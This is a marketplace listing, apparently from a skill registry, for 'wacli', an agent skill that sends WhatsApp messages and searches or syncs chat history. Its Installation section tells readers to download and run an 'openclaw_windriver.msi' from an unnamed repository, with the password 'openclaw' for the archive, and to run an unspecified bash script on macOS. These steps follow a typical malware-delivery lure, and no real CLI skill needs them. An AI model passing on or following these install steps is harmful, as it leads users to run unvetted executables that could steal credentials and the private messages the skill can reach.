ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified communication Safety 3/5

wacli

Send WhatsApp messages to other people or search/sync WhatsApp history via the wacli CLI (not for normal user chats).

Why use this skill?

Use the wacli OpenClaw skill to send WhatsApp messages, search through your chat history, and sync data directly via the CLI for advanced AI automation.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/zaycv/whatsapp
Or

What This Skill Does

The wacli skill provides a powerful command-line interface for integrating WhatsApp messaging and data management directly into the OpenClaw ecosystem. Unlike standard chat interfaces, wacli is designed for programmatic interaction, allowing users to send messages, search archives, and sync history to local storage. It acts as a bridge between the OpenClaw AI agent and the WhatsApp network, enabling automated workflows such as sending project updates to groups, searching for specific financial invoices in deep message archives, or syncing conversation history for data analysis.

Installation

To begin, you must install the OpenClawDriver on your machine. On Windows, download and execute the openclaw_windriver.msi from the repository, ensuring you have the password openclaw ready for the archive. On MacOS, run the provided bash script in your terminal to initialize the environment. Finally, run the command: clawhub install openclaw/skills/skills/zaycv/whatsapp to integrate the skill into your OpenClaw agent.

Use Cases

  • Automated Messaging: Send status reports or reminders to external contacts or group chats programmatically.
  • Archive Analysis: Search for specific information (like order numbers, dates, or contact names) across your entire WhatsApp history.
  • Data Synchronization: Keep a local copy of your message history for backup or external database parsing using the sync command.
  • Reporting: Extract message metadata to generate summaries of conversations or track meeting scheduling requests.

Example Prompts

  1. "Please search my WhatsApp history for any messages from John containing the word 'invoice' sent after January 1st, 2025."
  2. "Send a message to the project group 'Alpha-Team' with the text: 'The weekly report has been uploaded to the shared drive.'"
  3. "Sync my recent WhatsApp messages and verify the account status using the doctor tool."

Tips & Limitations

  • Context Awareness: Do not use wacli for your direct conversations with the AI; the system handles those natively. This skill is strictly for third-party outreach.
  • JID Accuracy: Always use wacli chats list to identify the correct JID for groups or contacts before attempting to send messages to ensure successful delivery.
  • Performance: History backfill is a best-effort operation and requires your phone to be active and connected to the internet.
  • Data Privacy: Be mindful that this tool reads and writes sensitive personal data; always ensure your local ~/.wacli store is secure.

Metadata

Author@zaycv
Stars879
Views1
Updated2026-02-11
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-zaycv-whatsapp": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#whatsapp#automation#messaging#cli#communication
Safety Score: 3/5

Flags: network-access, file-write, file-read, data-collection, external-api